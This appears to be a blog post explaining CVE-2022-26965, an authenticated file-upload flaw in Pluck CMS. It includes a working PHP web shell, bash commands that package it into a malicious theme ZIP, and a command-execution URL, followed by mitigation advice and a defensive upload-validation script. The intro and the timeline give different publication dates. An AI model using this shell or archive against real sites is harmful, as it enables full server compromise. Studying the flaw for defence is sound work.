On March 10, 2022, CVE-2022-26965 was published. It describes a high-severity vulnerability in Pluck CMS, an open-source content management system. Versions up to 4.7.16 allow an authenticated admin user to perform Remote Code Execution (RCE) by uploading a malicious theme. This happens due to insufficient validation in the theme upload feature at /admin.php?action=themeinstall.
In this post, I’ll break down the vulnerability in simple terms, explain how it can be exploited, show a code example, and share original references for further reading.
What is Pluck?
Pluck is a lightweight CMS for small websites. It’s written in PHP and lets users manage content, design, and themes from a simple web interface.
The Vulnerability: Unrestricted File Upload
The vulnerability exists in the way Pluck handles theme uploads. An admin can upload a ZIP file containing a theme. The application extracts the files from the ZIP into a directory under /data/themes/. However, Pluck does not validate the contents of the upload: it does not check whether the files in the ZIP are only theme files or whether they also include arbitrary PHP files.
This means an attacker with admin access can upload a ZIP archive with a PHP file (“web shell”) inside. Once the ZIP is extracted, the attacker can access the malicious PHP script via the web browser and execute any PHP code on the server.
Impact: This gives the attacker full control of the web server, including the ability to read/write files, pull sensitive information, and further compromise the environment.
Steps to Exploit
1. Log in as admin at /admin.php.
2. Go to Settings → Themes → Install New Theme (URL: /admin.php?action=themeinstall).
3. Upload a ZIP archive containing a standard theme folder structure, plus a PHP web shell (e.g. shell.php).
4. The CMS extracts the ZIP contents to /data/themes/[theme-name]/.
5. The attacker browses to /data/themes/[theme-name]/shell.php and executes arbitrary PHP code.
You can use the following simple PHP shell (save as shell.php):

```php
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
```
File structure of the ZIP you need:

```
malicioustheme/
├── theme.php
├── info.txt
└── shell.php <-- malicious shell
```
- theme.php and info.txt are standard files required by Pluck for a theme. (They can be empty or contain minimal valid content.)
Create the ZIP on Linux:

```bash
mkdir malicioustheme
echo "<?php // theme ?>" > malicioustheme/theme.php
echo "Malicious Theme" > malicioustheme/info.txt
echo "<?php if (isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>" > malicioustheme/shell.php
zip -r malicioustheme.zip malicioustheme/
```
Now, upload malicioustheme.zip via the admin panel as noted above.
Exploit the shell
Visit in your browser:

```
http://[pluck-site]/data/themes/malicioustheme/shell.php?cmd=whoami
```
Original References
- Exploit-DB Entry 50835
- cve.mitre.org Entry
- Huntr.dev Report
Patch & Mitigation
- Upgrade to the latest version of Pluck.
- Until patched, restrict admin access and use a web application firewall to detect/block suspicious file uploads. As defence in depth, configure the web server so that PHP files under /data/themes/ are not served directly, which stops an uploaded script from being reached through the browser.
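The root cause described above is that the theme installer never checks what the archive contains. The following is an added example (not Pluck's own code) of the allow-list check such an installer should run before extracting an upload; it assumes a theme is one top-level folder in which theme.php is the only PHP file permitted, info.txt is required, and everything else must be a static asset.

```python
# Added example, not Pluck's own code: allow-list check for a theme archive.
# Assumed rules: one top-level folder; theme.php is the only PHP file allowed;
# info.txt is required; every other entry must be a static asset.
import io
import posixpath
import zipfile

REQUIRED = {"theme.php", "info.txt"}
STATIC_EXT = {".css", ".js", ".png", ".jpg", ".jpeg", ".gif", ".svg", ".ico", ".woff", ".woff2"}
EXEC_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".cgi"}  # server may execute


def validate_theme_zip(data: bytes) -> list:
    """Return a list of problems; an empty list means the archive may be extracted."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a zip archive"]
    problems, seen, root = [], set(), None
    for info in zf.infolist():
        name = info.filename
        parts = posixpath.normpath(name).split("/")
        if name.startswith("/") or ".." in name.split("/"):  # zip-slip
            problems.append(f"path traversal: {name}")
            continue
        root = root or parts[0]
        if info.is_dir():
            continue
        if parts[0] != root or len(parts) < 2:
            problems.append(f"file outside theme folder: {name}")
            continue
        rel, base = "/".join(parts[1:]), parts[-1]
        ext = posixpath.splitext(base)[1].lower()
        if rel in REQUIRED:
            seen.add(rel)
        elif ext in EXEC_EXT or base.startswith(".ht"):  # .htaccess and friends
            problems.append(f"executable or server config file: {name}")
        elif ext not in STATIC_EXT:
            problems.append(f"unexpected file type: {name}")
    missing = REQUIRED - seen
    if missing:
        problems.append("missing required files: " + ", ".join(sorted(missing)))
    return problems


def build_zip(files: dict) -> bytes:
    # Constructed in-memory sample archive (not from the page) for trying the check.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body in files.items():
            zf.writestr(name, body)
    return buf.getvalue()
```

Run against an archive laid out like the one in the post (theme.php, info.txt and shell.php), the check reports shell.php as an executable file and the installer can refuse the upload instead of extracting it.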
Conclusion
CVE-2022-26965 is a classic example of the dangers of insufficient file validation in web applications. Always double-check what your app lets users upload! Sites running Pluck 4.7.16 or below are vulnerable to complete takeover if an attacker gains admin credentials, so patch immediately.
Further reading:
- Pluck GitHub
Timeline
Published on: 03/18/2022 07:15:00 UTC
Last modified on: 03/25/2022 17:54:00 UTC